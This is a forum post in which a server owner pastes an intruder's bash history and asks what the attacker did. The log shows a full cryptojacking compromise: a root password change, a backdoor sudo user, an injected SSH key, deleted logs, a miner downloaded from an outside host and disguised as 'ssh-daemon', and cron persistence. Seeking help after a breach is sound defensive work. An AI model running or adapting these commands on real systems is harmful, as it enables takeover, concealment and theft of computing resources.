babyfengfjx
babyfengfjx
2019-04-13 11:51

服务器被人攻击登录了,看了下操作记录,不知道有没有人能分析下这个人到底干了啥,想干啥?

  • bash

如下是其操作记录:

516  2019-04-12 15:51:16 top
  517  2019-04-12 15:51:26 kill -9 2796
  518  2019-04-12 15:51:27 password='QwqQw3899qQrT41qw91'
  519  2019-04-12 15:51:27 pkill -9 qW*; pkill -9 ddgs*; chattr -i /tmp/*; chmod -x /tmp/*;
  520  2019-04-12 15:51:27 bash /CloudrResetPwdAgent/bin/cloudResetPwdAgent.script remove
  521  2019-04-12 15:51:27 bash /CloudResetPwdUpdateAgent/bin/cloudResetPwdUpdateAgent.script remove
  522  2019-04-12 15:51:27 rm -rf /CloudrResetPwdAgent
  523  2019-04-12 15:51:27 rm -rf /var/log/secure
  524  2019-04-12 15:51:27 rm -rf /var/log/auth.log
  525  2019-04-12 15:51:27 rm -rf /CloudResetPwdUpdateAgent
  526  2019-04-12 15:51:27 SALT="Q9"
  527  2019-04-12 15:51:27 ln /usr/sbin/pidof /bin/pidof
  528  2019-04-12 15:51:27 HASH=$(perl -e "print crypt("${password}",${SALT})")
  529  2019-04-12 15:51:27 usermod --password ${HASH} root
  530  2019-04-12 15:51:27 useradd cronjob
  531  2019-04-12 15:51:27 usermod --password ${HASH} cronjob
  532  2019-04-12 15:51:27 usermod -aG wheel cronjob
  533  2019-04-12 15:51:27 usermod -aG root cronjob
  534  2019-04-12 15:51:27 echo '%wheel  ALL=(ALL)       ALL' >> '/etc/sudoers'
  535  2019-04-12 15:51:27 echo 'cronjob ALL=(ALL:ALL) ALL' >> '/etc/sudoers'
  536  2019-04-12 15:51:27 grep -q -F '* soft memlock 262144' /etc/security/limits.conf || echo '* soft memlock 262144' >> /etc/security/limits.conf
  537  2019-04-12 15:51:27 grep -q -F '* hard memlock 262144' /etc/security/limits.conf || echo '* hard memlock 262144' >> /etc/security/limits.conf
  538  2019-04-12 15:51:27 grep -q -F 'vm.nr_hugepages = 256' /etc/sysctl.conf || echo 'vm.nr_hugepages = 256' >> /etc/sysctl.conf
  539  2019-04-12 15:51:27 sysctl -w vm.nr_hugepages=256
  540  2019-04-12 15:51:27 killall -9 -e 'b' -v
  541  2019-04-12 15:51:27 killall -9 -e 'ps' -v
  542  2019-04-12 15:51:27 killall -9 -e 'bbb' -v
  543  2019-04-12 15:51:27 killall -9 -e 'ifconfig' -v
  544  2019-04-12 15:51:27 killall -9 -e 'zjgw' -v
  545  2019-04-12 15:51:27 killall -9 -e 'tsm' -v
  546  2019-04-12 15:51:27 killall -9 -e 'sys4' -v
  547  2019-04-12 15:51:27 killall -9 -e 'sshd65' -v
  548  2019-04-12 15:51:27 chmod -x /tmp/.mountfs/.rsync/ /tmp/.mountfs/.rsync/*
  549  2019-04-12 15:51:27 chattr +i -R /tmp/.mountfs/.rsync
  550  2019-04-12 15:51:27 chmod -x /root/.ttp/*
  551  2019-04-12 15:51:27 chattr +i -R /root/.ttp/
  552  2019-04-12 15:51:27 pkill mservice
  553  2019-04-12 15:51:27 pkill xmrigMiner
  554  2019-04-12 15:51:27 pkill xig
  555  2019-04-12 15:51:27 pkill anacron
  556  2019-04-12 15:51:27 pkill zigw
  557  2019-04-12 15:51:27 pkill cd
  558  2019-04-12 15:51:27 pkill systems
  559  2019-04-12 15:51:27 pkill fmdkhiizka
  560  2019-04-12 15:51:27 pkill bundle
  561  2019-04-12 15:51:27 pkill whpclxj
  562  2019-04-12 15:51:27 pkill qW3xT.4
  563  2019-04-12 15:51:27 pkill ddgs.3014
  564  2019-04-12 15:51:27 pkill sleep
  565  2019-04-12 15:51:27 pkill -9 sleep
  566  2019-04-12 15:51:27 pkill uqncnjpamg 
  567  2019-04-12 15:51:27 pkill rcu_sched
  568  2019-04-12 15:51:27 pkill grep
  569  2019-04-12 15:51:27 pkill sshd65
  570  2019-04-12 15:51:27 pkill useradd
  571  2019-04-12 15:51:27 pkill cnrig
  572  2019-04-12 15:51:27 chmod -x /tmp/ddgs.3014
  573  2019-04-12 15:51:27 chmod -x /tmp/qW3xT.4
  574  2019-04-12 15:51:27 pkill rcu_bh
  575  2019-04-12 15:51:27 pkill rcu_sched
  576  2019-04-12 15:51:27 pkill fehulztdac
  577  2019-04-12 15:51:27 pkill .xm.log
  578  2019-04-12 15:51:27 pkill zjgw
  579  2019-04-12 15:51:27 pkill hashfish
  580  2019-04-12 15:51:27 pkill rngd
  581  2019-04-12 15:51:27 pkill systemlog
  582  2019-04-12 15:51:27 pkill -9 anacrontab
  583  2019-04-12 15:51:27 pkill -9 hfxminer64
  584  2019-04-12 15:51:27 chmod -x /tmp/systems1
  585  2019-04-12 15:51:27 chmod -x /tmp/systems
  586  2019-04-12 15:51:27 pkill systems1
  587  2019-04-12 15:51:27 pkill systemxlv
  588  2019-04-12 15:51:27 pkill systems
  589  2019-04-12 15:51:27 pkill zjgw
  590  2019-04-12 15:51:27 pkill .systemcero
  591  2019-04-12 15:51:27 rm -rf /var/opt/.ssh/.rsync
  592  2019-04-12 15:51:27 service YiluzhuanqianSer stop
  593  2019-04-12 15:51:27 crontab -r
  594  2019-04-12 15:51:27 chattr -iR /opt/yi*/*
  595  2019-04-12 15:51:27 rm -rf /opt/yi*
  596  2019-04-12 15:51:27 chmod -x /etc/btmpsys.sh /etc/wtmpsys.sh
  597  2019-04-12 15:51:27 pkill wtmpsys.sh
  598  2019-04-12 15:51:27 pkill etc/btmpsys.sh
  599  2019-04-12 15:51:27 mkdir /opt
  600  2019-04-12 15:51:27 mkdir /opt/nginx-0.12
  601  2019-04-12 15:51:27 cd /opt
  602  2019-04-12 15:51:27 chattr -i /usr/bin/wget
  603  2019-04-12 15:51:27 chmod +x /usr/bin/wget
  604  2019-04-12 15:51:27 tar xvf /opt/nginx-0.12.tar.gz -C /opt/nginx-0.12
  605  2019-04-12 15:51:27 cd nginx-0.12
  606  2019-04-12 15:51:27 mv xmrig-*/xmrig ssh-daemon
  607  2019-04-12 15:51:27 mv xmrig-*/service service
  608  2019-04-12 15:51:27 chmod +x ssh-daemon
  609  2019-04-12 15:51:27 rm -rf config.json
  610  2019-04-12 15:51:27 chattr +i ssh-daemon
  611  2019-04-12 15:51:27 mkdir /opt/nu;
  612  2019-04-12 15:51:27 cd /opt/nu;
  613  2019-04-12 15:51:27 chattr +i config.json
  614  2019-04-12 15:51:27 chattr +i service
  615  2019-04-12 15:51:27 watch -n 5 pkill -9 qW3* &>/dev/null &
  616  2019-04-12 15:51:27 watch -n 5 pkill -9 rpciod* &>/dev/null &
  617  2019-04-12 15:51:27 mkdir ~/.ssh
  618  2019-04-12 15:51:27 chmod -x /usr/bin/perl; chattr +i /usr/bin/perl;
  619  2019-04-12 15:51:27 chmod -x /usr/cpu/-bash; chattr +i /usr/cpu/-bash
  620  2019-04-12 15:51:27 rm -rf /var/log/*
  621  2019-04-12 15:51:27 cd /opt/nu;
  622  2019-04-12 15:51:27 echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxfc4Lg21YVxp3ajPJ6F6ZntEHOZEW0Jatz/oLvE+VXXoFJOaiqIibhWwjgJ7fro+ZKNrIUuBa3jQNuSo4E6cpR9UTQrjR+TTeJVDdTc8p0QLWo+vIkwCSyqRJmE41vIlrCTdBpPr1QlYILVKhfayYoLswPxguN+IG7Hv30p3NYfC1T8qKbi93xqrzd8JkmWDsincZ1M/0z1uz92kBZdYWKGDHtn0Rpkb0OjqcSQX6Cw4zZ3c8W+dG+UQrKP2wr/xSXVnA8fsQpJMCDT0UMFfOUal7BQF9CrwTGcuFQPetKdx5ujoBJV8MhZ7hL14eK2AnCafHzt9gOnyT7t+GttYB user@debian' > ~/.ssh/authorized_keys
  623  2019-04-12 15:51:27 pkill -9 ssh-daemon;
  624  2019-04-12 15:51:27 crontab -r;
  625  2019-04-12 15:51:27 ln -s /bin/pidof /sbin/pidof;
  626  2019-04-12 15:51:27 ln /usr/sbin/pidof /bin/pidof;
  627  2019-04-12 15:51:27 apt-get install -y unzip;
  628  2019-04-12 15:51:27 yum install -y unzip;
  629  2019-04-12 15:51:28 wget --no-check-certificate http://8upload.ir/uploads/f8231241.zip -P /opt/nginx-0.12 -O /opt/renice-0.13.1.zip;
  630  2019-04-12 15:52:16 unzip /opt/renice-0.13.1.zip -d /opt/nu/;
  631  2019-04-12 15:52:16 mv /opt/nu/xmrig /opt/nu/renice;
  632  2019-04-12 15:53:55 ls
  633  2019-04-12 15:54:00 chattr -ia renice
  634  2019-04-12 15:54:01 rm -rf renice
  635  2019-04-12 15:54:04 mv xmrig ssh-daemon
  636  2019-04-12 15:54:05 chmod +x ssh-daemon 
  637  2019-04-12 15:54:06 echo '{ "algo": "cryptonight", "api": { "port": 0, "access-token": null, "id": null, "worker-id": null, "ipv6": false, "restricted": true }, "asm": true, "autosave": true, "av": 0, "background": true, "colors": true, "cpu-affinity": null, "cpu-priority": null, "donate-level": 0, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 99, "pools": [ { "url": "de03.supportxmr.com:443", "user": "8AtHbYqFpSWgtcZJQcfWzQfEyyntFpc9URB26ZFUe7MzbWGqGVcXFosB1ve6Dkzb52REfzMYqTjuJbryDQSCR6sGR626EaU", "pass": "u", "rig-id": null, "nicehash": false, "keepalive": true, "variant": -1, "tls": true, "tls-fingerprint": null } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "user-agent": null, "watch": false }' > config.json;
  638  2019-04-12 15:54:06 cd /opt/nu;
  639  2019-04-12 15:54:06 mv renice ssh-daemon;
  640  2019-04-12 15:54:06 sed -i -e 's/renice/ssh-daemon/g' /opt/nu/service;
  641  2019-04-12 15:54:06 crontab /opt/nu/service;
  642  2019-04-12 15:54:06 /opt/nu/ssh-daemon;
  643  2019-04-12 15:54:06 echo 'alias top="top -o COMMAND"' >> ~/.bashrc;source ~/.bashrc;
  644  2019-04-12 15:54:06 lscpu
  645  2019-04-12 15:54:06 pidof ssh-daemon
  646  2019-04-12 15:54:06 rm -rf /var/log/*;
  647  2019-04-12 15:54:09 exit
    ```
  • 点赞
  • 回答
  • 收藏
  • 复制链接分享

3条回答

为你推荐